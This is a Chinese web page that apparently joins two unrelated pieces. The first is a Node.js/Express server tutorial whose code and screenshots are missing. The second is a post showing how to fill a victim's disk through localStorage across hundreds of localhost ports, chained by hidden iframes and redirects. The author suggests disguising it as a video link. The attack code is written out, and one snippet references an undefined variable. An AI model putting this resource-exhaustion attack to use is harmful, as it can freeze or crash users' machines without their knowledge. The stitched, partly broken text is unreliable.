初探nodejs创建web服务器

1.什么是nodejs

     Node.js 是一个基于Chrome JavaScript 运行时建立的一个平台， 用来方便地搭建快速的， 易于扩展的网络应用· Node.js 借助事件驱动， 非阻塞 I/O 模型变得轻量和高效， 非常适合 运行在分布式设备 的 数据密集型 的实时应用

2.Node.js不是JS应用、而是JS运行平台

    Node.js是一个Javascript的运行环境。提到Javascript，大家首先想到的是日常使用的浏览器，现代浏览器包含了各种组件，包括渲染引擎、Javascript引擎等，其中Javascript引擎负责解释执行网页中的Javascript代码。作为Web前端最重要的语言之一，Javascript一直是前端工程师的专利。不过，Node.js是一个后端的Javascript运行环境（支持的系统包括*nux、Windows），这意味着你可以编写系统级或者服务器端的Javascript代码，交给Node.js来解释执行

3.简单用nodejs创建web服务器

1)访问 http://www.nodejs.org/，点击install，下载安装包，安装nodejs

2)打开cmd，检查nodejs是否安装好了：node -v



3)引入包

首先建立目录，进入目录 ： mkdir tt   ，cd tt



引入web服务器框架包和网页渲染引擎包：express、ejs







4）好的，现在包已经引入完毕，开始写代码吧

服务器代码：



模板abc.ejs代码，先创建views目录（express默认会在此目录下找模板），然后创建abc.ejs文件



5）运行服务器tt.js，在浏览器输入  http://localhost:8080/   就可以看结果啦

运行服务器：



浏览器结果：



有人说，前端的界限就在浏览器那儿。

无论你触发了多少bug，最多导致浏览器崩溃，对系统影响不到哪去。

这就像二次元各种炫酷的毁灭世界，都不会导致三次元的世界末日。

然而，作为一个前端，我发现是有方式打开次元大门的…

这个实验脑洞较大，动机无聊，但某种意义上反映了一些安全问题。

想象一下，有天你在家里上网，吃着火锅还唱着歌，点开一个链接，电脑突然就蓝屏了！想想还真有点小激动。

起因

故事得从localStorage说起。

html5的本地存储，相信大家都不陌生。将数据以二进制文件形式存储到本地，在当前应用得非常广泛。

windows下的chrome，localStorage存储于

C:\Users\xxx\AppData\Local\Google\Chrome\User
Data\Default\Local Storage

文件夹中。但如果任由网页无限写文件，对用户硬盘的伤害可想而知，因而浏览器对其做了大小限制。

对于一个域名+端口，PC侧的上限是5M-10M之间，移动侧是则不大于2.5M。

那么问题就变成：这样的限制足够保护用户硬盘了吗？

关键

关键的问题在于，这一限制，针对的是一个

域名+端口

。

也就是说，你访问

同一个域名的不同端口

，它们的localStorage并无关联，是分开存储的。

我用node简单地开启了服务器，这时，用户访问

http://127.0.0.1:1000

到

http://127.0.0.1:1099

这100个端口，会请求到同一个页面：

index.html

：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

var http = require('http'); var fs = require('fs'); //100个端口 for(var port = 1000; port< 1100; port++){ http.createServer(function (request, response) { //请忽略这种循环读文件的方式，只为了简便 fs.readFile('./index.html', function(err, content){ if(err) { } else { response.writeHead(200, { 'Content-Type' : 'text/html; charset=UTF-8' }); response.write(content); response.end(); } }); }).listen(port, '127.0.0.1'); }

当然，这个index.html里涉及了localStorage写操作。

1 2 3 4 5 6

var s = ""; //慢慢来，别写太大了，好害怕… for(var i=0; i< 3 * 1024 * 1024; i++){ s += "0"; } localStorage.setItem("testData", s);

我试着用浏览器分别访问了几个端口，结果是分开存储。一切跟剧本一样。

自动遍历

但这种程度还不够。

如果要实验变得更好（xie）玩（e）一些，问题就变成如何

让用户自动遍历这些端口

？

iframe是个好的尝试。

只要一打开

http://127.0.0.1:
1000

，页面的脚步就会创建一个iframe，去请求

http://127.0.0.1:
1001

，一直循环下去。

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 1718 19 20 21 22 23

var Main = (function(){ var _key = "testData"; var _max = 1100; //最大限制 return { init: function(){ //慢慢来，别写太大了，好害怕… var s = ""; for(var i=0; i< 3 * 1024 * 1024; i++){ s += "0"; } localStorage.setItem(_key, s); var port = parseInt(location.port)+1; if(port > _max) return; //新添加iframe var url = "http://127.0.0.1:" + port; var $iframe = document.createElement("iframe"); $iframe.src = url; document.getElementsByTagName("body")[0].appendChild($iframe); } } })();

当然iframe我们还可以设置为不可见，以掩盖这种不厚道的行为…

比方说，有人发给你一个链接，你打开后发现是个视频，而你根本注意不到背后的脚本，在视频播放的几分钟里，快要把你的C盘写满。

然后我就看到请求如潮水渐涨：




但是，请求到1081端口，最新的chrome就崩溃掉了…原来iframe嵌套太多，已经到达了浏览器的极限。

防止浏览器崩溃

C盘还未撑满，同志还需努力。怎么办？

突然想到，到达iframe极限之前，我们可以重定向啊。

每访问50个端口，就使用

window.location.href

重定向一次，去确保浏览器不崩溃。

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 1718 19 20 21 22 23 24 25 26 27 28 29

var Main = (function(){ var _key = "testData"; var _max = 1200; //最大限制 var _jumpSpace = 50; //为避免iframe过多导致浏览器crash，每50个执行跳转 return { init: function(){ //慢慢来，别写太大了，好害怕… var s = ""; for(var i=0; i< 3 * 1024 * 1024; i++){ s += "0"; } localStorage.setItem(_key, s); var port = parseInt(location.port)+1; if(port > _max) return; if(port % _jumpSpace == 0){ //每50个，重定向一次 window.location.href = url; }else{ //新添加iframe var $iframe = document.createElement("iframe"); $iframe.src = url; document.getElementsByTagName("body")[0].appendChild($iframe); } } } })();

事实证明，这种蛮拼的方法的确可行。

至此，只要访问

http://127.0.0.1:
1000

，就会往Local Storage文件夹里写入近500M无用数据：




里面的数据是这样的：

继续实验的黑科技

算了下我的C盘还有空间嘛，那就把端口数量从100增长到200个。

结果是这样的，到达了1.17G大小。




在后续的实验中，我就慢慢的把端口数量与存储的数据调大。

电脑也运行得越来越慢。这是为什么呢？

我观察到，有时候执行

localStorage.setItem()

后，在文件夹里不一定立即能看到数据文件。

怀疑这些数据会被chrome先放到内存里，以避免重复读写带来的消耗，在空闲或关闭的时机，再写进硬盘里。

但此时，浏览器已经影响到系统了。它处于一种“不会崩溃”，但“因为占用了许多内存，已经妨碍用户电脑的正常使用”的状态。

即使用户关闭了浏览器窗口，也不会很快恢复。要知道读写任务并不是随窗口关闭而终止的，否则浏览器会丢失数据。

遭遇黑科技的人们能做的只有：

等待；

用任务管理器关掉chrome进程，再等待；

相信并尝试“重启电脑解决90%电脑问题”的科学论断

可以说，浏览器的内心几乎是崩溃的。

最后

最后，还是得用严肃脸告诫一下：害人之心不可无。

本实验，从一开始就是怀揣着将

安全问题上交给国家的初衷

去做的（是的就是这么纯粹）。

后续，看着C盘还有2G空间，我又把端口增长到2000个，试下会发生什么。

由于请求过多，需要一定时间，我就去做别的事情了。

回来后发现房间安静祥和，美轮美奂，一片蓝光，像是加了特技。





那么问题来了，计算机修理哪家强？

有点急…